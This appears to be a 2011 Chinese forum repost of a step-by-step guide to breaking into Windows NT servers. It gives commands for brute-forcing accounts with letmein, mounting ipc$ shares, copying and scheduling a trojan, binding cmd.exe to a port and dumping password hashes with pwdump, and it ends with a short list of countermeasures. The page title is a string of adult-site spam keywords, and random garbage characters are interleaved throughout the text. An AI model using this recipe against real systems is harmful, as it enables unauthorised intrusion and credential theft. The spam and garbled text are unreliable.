免费97视频在线精品国自产拍|亚洲就去吻婷婷永久网|香蕉视观看在线a|日本精品AⅤ在线观看

<dl id="aauvq"></dl>
<blockquote id="aauvq"></blockquote>


<thead id="aauvq"></thead>
<dl id="aauvq"><noframes id="aauvq"></noframes></dl>


          

          汶上信息港
          
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮) [打印本頁]
          

          
作者: 雜七雜八    時(shí)間: 2011-1-12 16:31
          
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮)
          看了篇文章介紹使用netbus 或 netspy 遠(yuǎn)程入侵nt系統(tǒng),感覺真是。。看來nt系統(tǒng)的共享機(jī)制如果不配合火墻使用,SMB會(huì)給你造成很大麻煩。?!∵B小小 只的木馬都可以讓nt管理員頭大。 
          
; s7 W  c0 n! @7 v    其攻擊過程如下: 
          
8 p& _/ g7 M: c! R4 @- x9 N1、使用掃描工具查找NT主機(jī)         s1 ]+ t" l- |9 B" J* ]
          
2 、確定攻擊目標(biāo)后,使用letmein 對(duì)目標(biāo)主機(jī)進(jìn)行攻擊, 如: 7 u4 ^- E3 Z! g6 T
          
letmein file://x.x.x.x/ -all -g mypwd (對(duì)\\x.x.x.x上所有用戶攻擊) 
          
$ ?1 I2 i5 O2 i5 Yletmein file://x.x.x.x/ -admin -g mypwd (對(duì)\\x.x.x.x上管理員攻擊) ! ?; j' _3 W2 O1 ^
          
letmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶) 7 C. W  O9 q8 x; R0 f* r. Z; Y* i
          
注:- 確定目標(biāo)后,收集目標(biāo)信息并嘗試取得非法資源 , Y& _  A3 B; _, q* W" i
          
3、當(dāng)letmein 獲取相關(guān)管理員權(quán)限后,使用ms提供的合法命令: 5 y: n, y. r) g1 e1 H
          
net use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠(yuǎn)程資源并將木馬拷入遠(yuǎn)程 9 g5 q1 f, q5 a
          
copy x:\netserver.exe \\x.x.x.x\admin$\system32 
          
9 J* Q+ |# G9 q# g1 O7 J4、使用合法ms命令遠(yuǎn)程啟動(dòng)木馬服務(wù): 
          
" s" x9 y# t3 K& tnetsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg 
          
/ H; `. _! I+ D! z+ H6 Q/ w9 G
          
2 m% i$ V% |( |/ }/ h   該方法有其巧妙之處。。利用nt的任務(wù)計(jì)劃管理,在特定時(shí)候啟動(dòng)木馬服務(wù) 
          
& X. n) |# X. ^+ s8 m+ o3 Z6 H& G5 i5 b0 t  o9 Z( u6 s
          
   另一種方法: 7 y; b# P+ [0 \. j/ r
          
   將ntsrver.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄, 如cgi-bin或scripts,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務(wù)將被啟動(dòng)
          
% B! e9 O! N+ U# x
          
! {- M" i7 C4 E8 a& L( D    到此,該次攻擊可以算成功了,遠(yuǎn)程資源已在別人控制下。 
          
. Z, g3 {# P6 ?5 [6 ?6 ?    如果在遠(yuǎn)程使用app redirect 啟動(dòng)一個(gè)cmd.exe到特定端口 , 那么你可以telnet 到該端口,更方便使用該遠(yuǎn)程資源 。比如:使用pwdump 將遠(yuǎn)程nt上所有用戶和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來運(yùn)算。 分析該次攻擊的整體過程,不難看出,關(guān)鍵步驟是letmein取得admin權(quán)限,但是很不幸,就目前廈門(有些是省內(nèi))的nt服務(wù)器管理員而言,密碼對(duì)letmein只是多花幾分鐘而已。我對(duì)某些大的公共平臺(tái)服務(wù)器進(jìn)行掃描的結(jié)果,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上。而且在這些被進(jìn)入的機(jī)器上,SMB都有在tcp/ip上 跑,有兩臺(tái)有配備火墻,但是沒有封閉對(duì)外137-139口。 
          
- n8 b) Z0 S2 `2 `/ q- n# ~. @3 h; K! s7 \) F" z. n! x
          
     對(duì)策: & K7 G( k  b- y1 ?, h9 D6 U, d
          
1、還是老話,密碼的選擇問題,使用向..@2KjsfiM7v!09..這樣的密碼會(huì)讓任何使用 暴力法計(jì)算的機(jī)器算到cpu燒掉。 * y( v2 W- U4 s7 N& j3 F
          
2、nt網(wǎng)絡(luò)的適當(dāng)配置,不要在對(duì)外的nc綁定共享服務(wù)是個(gè)好習(xí)慣,特別是tcp/ip協(xié)議。 5 c  L6 G& q8 b! o# v2 l& i
          
3、防火墻的配置,屏蔽一切不需要的服務(wù)端口,象netebui在tcp/ip上的137-139口,開這些口只會(huì)使你的系統(tǒng)處于危險(xiǎn)的處境,如果非要在遠(yuǎn)程使用這些口的服務(wù),建議使用其他軟件來代替。 
          
9 o3 V! E/ X9 _. W' J1 P" o) A4、及時(shí)檢查日記和監(jiān)控服務(wù)的運(yùn)行,定時(shí)對(duì)文件系統(tǒng)的權(quán)限受托關(guān)系進(jìn)行檢查。 
          
( T# f# [% K( W: X7 z9 E5、管理人員素質(zhì)的提高,安全風(fēng)險(xiǎn)意思加強(qiáng)無疑對(duì)你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時(shí)不刻在影響著你 。
          
' G7 {. U6 t9 U7 m3 A




          

          

          歡迎光臨 汶上信息港 (http://www.ywnyjx.com/)

Powered by Discuz! X3.5